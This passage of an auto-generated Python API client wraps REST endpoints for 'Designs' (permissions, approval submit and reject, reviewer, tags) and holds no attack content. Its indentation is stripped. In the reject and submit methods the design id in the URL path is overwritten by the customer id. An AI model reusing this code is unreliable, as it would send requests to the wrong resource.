return self.designs_id_permission_delete_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_permission_delete_with_http_info(id, **kwargs)
return data
def designs_id_permission_delete_with_http_info(self, id, **kwargs):
"""
Deletes permission of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_permission_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_delete`")
collection_formats = {}
resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_permission_get(self, id, **kwargs):
"""
Fetches hasOne relation permission.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DesignPermissionSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_permission_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_permission_get_with_http_info(id, **kwargs)
return data
def designs_id_permission_get_with_http_info(self, id, **kwargs):
"""
Fetches hasOne relation permission.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DesignPermissionSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_permission_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_get`")
collection_formats = {}
resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignPermissionSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_permission_post(self, id, **kwargs):
"""
Creates a new instance in permission of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignPermissionSet data:
:return: DesignPermissionSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_permission_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_permission_post_with_http_info(id, **kwargs)
return data
def designs_id_permission_post_with_http_info(self, id, **kwargs):
"""
Creates a new instance in permission of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignPermissionSet data:
:return: DesignPermissionSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_permission_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_post`")
collection_formats = {}
resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignPermissionSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_permission_put(self, id, **kwargs):
"""
Update permission of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_put(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignPermissionSet data:
:return: DesignPermissionSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_permission_put_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_permission_put_with_http_info(id, **kwargs)
return data
def designs_id_permission_put_with_http_info(self, id, **kwargs):
"""
Update permission of this model.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_permission_put_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param DesignPermissionSet data:
:return: DesignPermissionSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_permission_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_permission_put`")
collection_formats = {}
resource_path = '/Designs/{id}/permission'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignPermissionSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_portal_get(self, id, **kwargs):
"""
Fetches belongsTo relation portal.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_portal_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: Portal
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_portal_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_portal_get_with_http_info(id, **kwargs)
return data
def designs_id_portal_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation portal.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_portal_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: Portal
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_portal_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_portal_get`")
collection_formats = {}
resource_path = '/Designs/{id}/portal'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Portal',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_put(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_put(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param Design data: Model instance data
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_put_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_put_with_http_info(id, **kwargs)
return data
def designs_id_put_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_put_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param Design data: Model instance data
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_put`")
collection_formats = {}
resource_path = '/Designs/{id}'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_reject_post(self, id, id2, **kwargs):
"""
Reject design
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_reject_post(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:param Design data:
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_reject_post_with_http_info(id, id2, **kwargs)
else:
(data) = self.designs_id_reject_post_with_http_info(id, id2, **kwargs)
return data
def designs_id_reject_post_with_http_info(self, id, id2, **kwargs):
"""
Reject design
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_reject_post_with_http_info(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:param Design data:
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'id2', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_reject_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_reject_post`")
# verify the required parameter 'id2' is set
if ('id2' not in params) or (params['id2'] is None):
raise ValueError("Missing the required parameter `id2` when calling `designs_id_reject_post`")
collection_formats = {}
resource_path = '/Designs/{id}/reject'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'id2' in params:
path_params['id'] = params['id2']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_rejection_comment_get(self, id, **kwargs):
"""
Fetches belongsTo relation rejectionComment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_rejection_comment_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_rejection_comment_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_rejection_comment_get_with_http_info(id, **kwargs)
return data
def designs_id_rejection_comment_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation rejectionComment.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_rejection_comment_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: DesignComment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_rejection_comment_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_rejection_comment_get`")
collection_formats = {}
resource_path = '/Designs/{id}/rejectionComment'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DesignComment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_replace_post(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_replace_post(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param Design data: Model instance data
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_replace_post_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_replace_post_with_http_info(id, **kwargs)
return data
def designs_id_replace_post_with_http_info(self, id, **kwargs):
"""
Replace attributes for a model instance and persist it into the data source.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_replace_post_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Model id (required)
:param Design data: Model instance data
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'data']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_replace_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_replace_post`")
collection_formats = {}
resource_path = '/Designs/{id}/replace'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in params:
body_params = params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_requester_get(self, id, **kwargs):
"""
Fetches belongsTo relation requester.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_requester_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_requester_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_requester_get_with_http_info(id, **kwargs)
return data
def designs_id_requester_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation requester.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_requester_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_requester_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_requester_get`")
collection_formats = {}
resource_path = '/Designs/{id}/requester'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_reviewer_get(self, id, **kwargs):
"""
Fetches belongsTo relation reviewer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_reviewer_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_reviewer_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_reviewer_get_with_http_info(id, **kwargs)
return data
def designs_id_reviewer_get_with_http_info(self, id, **kwargs):
"""
Fetches belongsTo relation reviewer.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_reviewer_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param bool refresh:
:return: TeamMember
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'refresh']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_reviewer_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_reviewer_get`")
collection_formats = {}
resource_path = '/Designs/{id}/reviewer'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
if 'refresh' in params:
query_params['refresh'] = params['refresh']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TeamMember',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_submit_post(self, id, id2, **kwargs):
"""
Submit design for approval
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_submit_post(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_submit_post_with_http_info(id, id2, **kwargs)
else:
(data) = self.designs_id_submit_post_with_http_info(id, id2, **kwargs)
return data
def designs_id_submit_post_with_http_info(self, id, id2, **kwargs):
"""
Submit design for approval
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_submit_post_with_http_info(id, id2, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str id2: Customer id (required)
:return: Design
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'id2']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method designs_id_submit_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `designs_id_submit_post`")
# verify the required parameter 'id2' is set
if ('id2' not in params) or (params['id2'] is None):
raise ValueError("Missing the required parameter `id2` when calling `designs_id_submit_post`")
collection_formats = {}
resource_path = '/Designs/{id}/submit'.replace('{format}', 'json')
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'id2' in params:
path_params['id'] = params['id2']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/x-www-form-urlencoded', 'application/xml', 'text/xml'])
# Authentication setting
auth_settings = ['access_token']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Design',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def designs_id_tags_count_get(self, id, **kwargs):
"""
Counts tags of Design.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.designs_id_tags_count_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Design id (required)
:param str where: Criteria to match model instances
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.designs_id_tags_count_get_with_http_info(id, **kwargs)
else:
(data) = self.designs_id_tags_count_get_with_http_info(id, **kwargs)
return data
